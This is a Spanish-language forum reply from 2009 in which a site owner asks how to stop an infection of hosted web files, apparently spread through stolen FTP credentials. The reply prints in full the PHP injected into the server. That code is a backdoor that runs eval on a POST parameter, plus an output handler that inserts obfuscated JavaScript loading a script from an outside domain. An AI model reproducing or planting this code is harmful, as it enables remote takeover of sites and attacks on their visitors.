Tema: Codigo malicioso dentro de pagina web con codificacion unescape javascript inyeccion
Ver Mensaje Individual
  #13 (permalink)  
Antiguo 12/05/2009, 14:05
Avatar de maverick2008
maverick2008
 
Fecha de Ingreso: agosto-2008
Mensajes: 18
Antigüedad: 15 años, 8 meses
Puntos: 0
Respuesta: Codigo malicioso dentro de pagina web con codificacion unescape javascript
Hola.

Según el proveedor de mi servicio de hosting, se debe a un troyano que es muy dificil de detectar. Este se conecta por FTP y comienza a crear codigo "basura" en la cabecera, cuerpo o pie de pagina. Recomienda utilizar un buen antivirus y original, ademas de un sistema operativo original.

Esto es parte del codigo agregado a los archivos del servidor:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_PO ST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL ',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2Nya XB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBzT3U9JyUnO3ZhciB sOG49Jz43NmE+NzI+MjBhPjNkPjIyU2M+NzJpPjcwdEU+NmU+N jdpbmU+MjI+MmNiPjNkPjIyVj42NXJzaW9uKD4yOSs+MjI+MmN qPjNkPjIyPjIyPjJjPjc1PjNkbj42MXZpPjY3YT43ND42Zj43M j4yZXU+NzM+NjU+NzI+NDE+NjdlbnQ+M2JpZigoPjc1PjJlPjY 5PjZlZGV4PjRmPjY2KD4yMlc+NjluPjIyKT4zZTApPjI2PjI2P jI4dT4yZWluZGU+NzhPPjY2KD4yMk5UPjIwNj4yMik+M2MwPjI 5PjI2PjI2KGRvPjYzdW0+NjVuPjc0PjJlY28+NmZraWU+MmVpb mRleE9mKD4yMm1pPjY1az4zZD4zMT4yMik+M2M+MzApPjI2PjI 2KHR5cGVvZj4yOHo+NzJ2enRzKT4yMT4zZHR5cGVvZig+MjJBP jIyKSkpPjdiej43MnZ6dHM+M2Q+MjJBPjIyPjNiPjY1dmFsPjI 4PjIyaWYoPjc3aT42ZWRvdz4yZT4yMithKz4yMilqPjNkais+M jIrYSs+MjJNYWpvcj4yMitiKz42MSs+MjJNaW5vcj4yMis+NjI rPjYxKz4yMkJ1aWxkPjIyK2IrPjIyaj4zYj4yMik+M2Jkb2N1P jZkZW50PjJldz43Mml0ZSg+MjI+M2NzY3JpcHQ+MjBzPjcyYz4 zZD4yZj4yZj42N3VtYmw+NjFyPjJlPjYzbj4yZj43MnM+NzM+M mY+M2Y+Njk+NjQ+M2Q+MjI+MmJqKz4yMj4zZT4zYz41Yz4yZj4 3Mz42M3JpcD43ND4zZT4yMik+M2I+N2QnO3ZhciBCdTdyPXVuZ XNjYXBlKGw4bi5yZXBsYWNlKC8+L2csc091KSk7ZXZhbChCdTd yKX0pKCk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).ch r(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$ v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos( $v,'document.write')))$s=str_replace($v,'',$s);}$s 1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_re place('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);else if(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($ b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_l kojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!=' tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

-----------------------------------------------------------------------------------



Lastima que la mayoria de los clientes no utilicen S.O. original y menos antivirus. Si es asi nuestros servidores están expuestos. Me informan que pueden banear las paginas alojadas con estos problemas.

Si cambias la contraseña FTP, al final, siempre tendras que darle los codigos al cliente porque este los necesita.

Si alguien encuentra una "cura" de impedir estos ataques a los pobres archivos del servidor se agradecerá.

Mantengan informados